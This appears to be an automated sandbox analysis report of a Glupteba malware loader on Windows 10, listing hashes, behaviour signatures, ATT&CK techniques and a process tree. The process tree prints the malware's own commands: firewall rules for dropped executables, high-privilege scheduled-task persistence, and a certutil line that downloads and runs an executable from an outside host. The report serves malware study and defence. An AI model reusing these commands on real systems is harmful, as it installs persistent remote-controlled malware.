Analysis

  • max time kernel
    131s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    24-05-2022 21:52

General

  • Target

    dcd7ddd4bbe35ebe79f85faabb564edbdebc1d3bcb16ad5ab79eac93531974bb.exe

  • Size

    3.8MB

  • MD5

    2dfc626b5d8f984fd48d725be44cdc00

  • SHA1

    14560e321f87aa491882861802eae2783d8242fe

  • SHA256

    dcd7ddd4bbe35ebe79f85faabb564edbdebc1d3bcb16ad5ab79eac93531974bb

  • SHA512

    84fcae44ebeae33b7810e9fcd32edce43f0f9a3e9a53323f63f01640bb1f932d983c71bbe82b90e38f8d6ad22527690a3a8681dc424c36832ff8ba2d0d01c5ef

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in System32 directory 8 IoCs
  • Drops file in Windows directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\dcd7ddd4bbe35ebe79f85faabb564edbdebc1d3bcb16ad5ab79eac93531974bb.exe
    "C:\Users\Admin\AppData\Local\Temp\dcd7ddd4bbe35ebe79f85faabb564edbdebc1d3bcb16ad5ab79eac93531974bb.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4128
    • C:\Users\Admin\AppData\Local\Temp\dcd7ddd4bbe35ebe79f85faabb564edbdebc1d3bcb16ad5ab79eac93531974bb.exe
      "C:\Users\Admin\AppData\Local\Temp\dcd7ddd4bbe35ebe79f85faabb564edbdebc1d3bcb16ad5ab79eac93531974bb.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1488
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3024
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
            PID:3908
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2964
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes
            4⤵
              PID:2208
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe ""
            3⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4112
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              4⤵
              • Creates scheduled task(s)
              PID:4756
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              4⤵
              • Creates scheduled task(s)
              PID:2300
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              4⤵
              • Executes dropped EXE
              PID:3436
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:340
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4508

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      2
      T1112

      Install Root Certificate

      1
      T1130

      Discovery

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        2dfc626b5d8f984fd48d725be44cdc00

        SHA1

        14560e321f87aa491882861802eae2783d8242fe

        SHA256

        dcd7ddd4bbe35ebe79f85faabb564edbdebc1d3bcb16ad5ab79eac93531974bb

        SHA512

        84fcae44ebeae33b7810e9fcd32edce43f0f9a3e9a53323f63f01640bb1f932d983c71bbe82b90e38f8d6ad22527690a3a8681dc424c36832ff8ba2d0d01c5ef

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        2dfc626b5d8f984fd48d725be44cdc00

        SHA1

        14560e321f87aa491882861802eae2783d8242fe

        SHA256

        dcd7ddd4bbe35ebe79f85faabb564edbdebc1d3bcb16ad5ab79eac93531974bb

        SHA512

        84fcae44ebeae33b7810e9fcd32edce43f0f9a3e9a53323f63f01640bb1f932d983c71bbe82b90e38f8d6ad22527690a3a8681dc424c36832ff8ba2d0d01c5ef

      • memory/340-147-0x0000000000000000-mapping.dmp
      • memory/1488-133-0x0000000000000000-mapping.dmp
      • memory/1488-134-0x000000000156B000-0x0000000001911000-memory.dmp
        Filesize

        3.6MB

      • memory/1488-136-0x0000000000400000-0x000000000100C000-memory.dmp
        Filesize

        12.0MB

      • memory/2208-139-0x0000000000000000-mapping.dmp
      • memory/2300-144-0x0000000000000000-mapping.dmp
      • memory/2964-138-0x0000000000000000-mapping.dmp
      • memory/3024-135-0x0000000000000000-mapping.dmp
      • memory/3436-145-0x0000000000000000-mapping.dmp
      • memory/3908-137-0x0000000000000000-mapping.dmp
      • memory/4112-140-0x0000000000000000-mapping.dmp
      • memory/4112-148-0x0000000001A00000-0x0000000001DA6000-memory.dmp
        Filesize

        3.6MB

      • memory/4112-149-0x0000000000400000-0x000000000100C000-memory.dmp
        Filesize

        12.0MB

      • memory/4128-130-0x000000000169C000-0x0000000001A42000-memory.dmp
        Filesize

        3.6MB

      • memory/4128-132-0x0000000000400000-0x000000000100C000-memory.dmp
        Filesize

        12.0MB

      • memory/4128-131-0x0000000001A50000-0x0000000002145000-memory.dmp
        Filesize

        7.0MB

      • memory/4756-143-0x0000000000000000-mapping.dmp